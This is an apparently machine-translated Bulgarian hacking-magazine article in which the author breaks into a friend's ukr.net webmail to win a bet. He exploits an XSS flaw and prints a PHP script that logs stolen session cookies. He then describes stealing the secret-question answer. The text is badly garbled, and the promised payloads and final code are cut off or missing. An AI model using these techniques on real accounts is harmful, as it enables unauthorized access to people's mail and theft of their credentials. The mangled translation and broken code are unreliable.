Пълен улавяне пощенска кутия изобщо за начинаещ хакер безплатни програми за хакване, видео

[Опит номер 2 и успешен финал]
Налях функционален Sniff да си домакин, заменя на XSS проектират пътя до него, и е изпратил писмо до новото. Мина известно време, а в дневника ми вече са съхранени ценните рекорд. Отговорът на въпроса, това беше малко неочаквано. Това беше думата: "Begemot". ))
Това е всичко. Това е начина, благодарение на познанията си в атентатите поведение XSS, аз спечелил спора и получи заслужена награда му, което е това, което читателят, искам ....))

Стъпка по стъпка за възстановяване на паролата

Подпис: пълния път до промяна пас

ПРЕДУПРЕЖДЕНИЕ
Разбира се, хакване сапун, така, както всеки хакване дейност, тъй като незаконно, така че винаги да държи под око на тяхната безопасност, и още по-добре, да не се включат в него. ))

Цензурира Забележка: Специално за списание "хакер" [03 (87)]

Пълен улавяне пощенска кутия на www.ukr.net
[Сух Online]

[Въведение]
Тази история се проведе в началото на зимата, и започна да се оспорва с приятеля ми. Някак си, аз завързали разговор с нас за хакерите и информационната сигурност като цяло, и спорът приключи няколко бутилки бира, че мога да се чукат поща си, което беше на ukr.net сървър. Защо този пост беше избрана от моя приятел, нямам представа, но това е добре с мен с глава. Също така, аз знаех, че той проверява пощата през уеб интерфейса, а дори и чрез магаре, което отново е в ръката ми. Ето защо, аз веднага отказал банална B, Брут, troyaninga т.н. и аз избрах моя любим метод-XSS атака.

Идеята е болезнено проста: да се намери XSS # 96; ку правилната форма на скриптове sployt, изпрати писмо до него и го хвана за своите обучени бисквитки, които, с добър сценарий, паролата ще бъде чист. Идеята е скучно и проста, но въпреки това, екшън и повече или по-малко стабилни. Така че, следващата стъпка е да се намери XSS.

[Търси XSS дупки]
Трябва да кажа, че идвам в скрапа супер елегантен дизайн, така че реших да се копае на стандарта, а именно да се зареди скрипт чрез снимката. В моя случай, аз се обичайната сценария, като този:

Всичко под наем. Scripting дизайн не Парс и работи перфектно!
Сега ми кажи какво съм действал под s.php. Това е нормална обучени PHP код, който в най-простата си форма, изглежда, например, по следния начин:

Php код обучени s.php
// приема бисквитки
$ Query = $ _ СЪРВЪРА [\ »QUERY_STRING \»];
// запишете резултата във файл: log.html
$ FP = fopen (\ »log.html \», \ »на \");
fputs ($ FP, \ »$ заявка
\ ");
fclose ($ РП);
?>

Подпис: XSS скриптове трябва да се изпращат само в HTML формат

Всичко мина добре. Моят помощник Donkey zahaval XSS # 96; Ку, обучени и аз имам парче тук:

[Функционално обучени]
Функционално обучени, към днешна дата, се счита за много напреднала технология, но въпреки това, се споменава за това аз не често се запознаем. За по-добро разбиране на технологията, аз съветвам да посетите линка в страничната лента, но за сега нека да се справят с нашия случай.
Първо най-важното. Погледни в моя [email protected] и отидете на "Настройки" -> "лична информация".

Подпис: още грешка на разработчиците с отговора на въпроса ви тайна

Е, аз осъзнах какво имам предвид? Не? Хмм ... но О, добре, обърнете внимание на "правилния отговор", но в действителност това не е нищо подобно на отговора на защитния си въпрос. Да, в неясен и неразбираем без да се изисква парола. Смешни .... Бих искала да отбележа, че грешката е доста стар, а аз не съм наистина очаквам с нетърпение да си съществуване, защото мислех, че компетентните администраторите закърпени, но както виждате, той не беше там. Така че, задачата на обучени функция, в този случай се крие именно във факта, че отговора на тайния въпрос крадат.
Къде ще стигнем обучени, а дори и така той работи толкова красиво? Отговорът е прост, го напиша сам. За този случай, кодът ще изглежда така: